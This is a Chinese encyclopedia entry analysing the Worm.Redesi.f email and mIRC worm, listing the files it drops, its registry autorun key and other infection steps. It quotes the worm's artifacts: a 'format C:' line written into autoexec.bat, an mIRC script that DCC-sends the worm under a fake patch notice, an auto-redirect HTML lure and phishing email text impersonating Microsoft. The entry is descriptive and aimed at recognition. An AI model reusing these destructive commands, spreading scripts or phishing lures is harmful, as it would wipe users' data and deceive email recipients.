词条 | Worm.Redesi.f |
释义 | 基本信息病毒别名:I-Worm.Redesi.f [AVP],I-Worm/Redesi.f [KV],Worm.Redesi.f[RS] 处理时间: 威胁级别:★★ 中文名称:红丝带变种F 病毒类型:蠕虫 影响系统:Win9x / WinNT 病毒行为这是一个通过电子邮件和mIRC传播的蠕虫病毒。该病毒发作的时候会弹出一个Windows更新成功的消息框来欺骗用户,并将病毒的5个副本拷贝到C盘根目录下,在注册表中添加启动项,实现病毒的开机自启动。病毒还会向C:\\autoexec.bat中写入2条批处理命令,一条显示“With a fool no season spend, or be counted as his freind.”,另一条则是格式化C盘。通过更改mIRC的脚本配置文件,使得mIRC系统与病毒文件建立联系,扩展病毒的传播途径。病毒还会生成一个html文件C:\\inetpub\\wwwroot\\default.htm,当用户打开该页面的时候,就会打开病毒文件。该病毒在Outlook Express的地址薄里面收集邮件地址,再以Microsoft的名义将病毒做为附件发送出去,该邮件极具欺骗性,用户很可能会受骗而去打开附件,从而感染该病毒。 1)在C盘根目录下建立病毒的多个副本(都是隐藏文件): C:\\Commond.exe C:\\MAPI.exe C:\\Sysupdate.exe C:\\UserConfig.exe C:\\disksync.exe 2)在注册表中为病毒的自启动添加启动项: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "Desire"="C:\\commond.exe" 在KEY_LOCAL_MACHINE\\Software\\Microsoft下添加键值: "Desire"="Done" 3)向C:\\autoexec.bat写入以下内容: ECHO With a fool no season spend, or be counted as his freind. format C: /autotest 4)向C:\\mirc\\script.ini写入以下内容: [script] n0= on 1:JOIN:#:{ n1= .msg $nick Dear User. Please apply this patch that will protect you from UDP flooding. If you are running a Linux IRC client this update is not needed due to kernel filtering. Regards. Dalnet / Undernet staff. n2= .copy C:\\MAPI.exe C:\\mirc\\IRCUpdate.IRC.pif n3= .dcc send $nick C:\\mirc\\IRCUpdate.IRC.pif n4= } 5)建立文件: C:\\inetpub\\wwwroot\\Web.exe 生成对应该文件的网页文件: C:\\inetpub\\wwwroot\\default.htm 该文件的内容如下: META http-equiv="refresh" content="0; url=Web.exe" A href="./Web.exe" h3 We Are Forever /h3 /A 6)取下面的某一行做为邮件的主题: FW: Windows at Risk. FW: Buffer overflow could cause IT meltdown. FW: Insufficient bounds chcecking cause buffer over run. FW: Executable stack could cost IT sector millions. FW: Invalid instruction causes AX and BX registers to differ. FW: Terrorists release computer virus. FW: Microsoft and C.E.R.T Corobaration FW: Stack overrun can cause data loss on first bootable disk FW: Microsoft Update. Final Release Candidate. FW: Redesi worm. MAPI update.. 7)邮件: Hey. Sorry I've not emailed you for a while ... well I am now. Just letting you know I'll be sending an attachment in my next email,so you don't have to worry. I know you can't be too carefull with these virii around, but this is OK. Speak to you later. Hey Well, here is the email I told you I was going to send. I'll speak to you more later. The boss is comming. -----Original Message----- From: Microsoft Security List [mailto:security@microsoft.com] Sent: 25 October 2001 12:03 Subject: Buffer overflow Dear Subscriber Due to insufficient bounds checking in the Windows Messaging API any value stores in the AX and BX registers(and their register halves any XOR (compare) operation against these to registers or the h and l register halfs will always return and value of 1, causing the JNE instruction to execute. We consider this a HIGH RISK vulnerability,and any computer hacker having any knowledge of the assembly language could write a working egg to exploit this flaw. It is highly advised that you install the attached MAPI update to stop any subsequent security breach. Regards Microsoft Support 8)取下面的某一个名字做为附件名: Commond.exe MAPI.exe Sysupdate.exe UserConfig.exe disksync.exe |
随便看 |
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。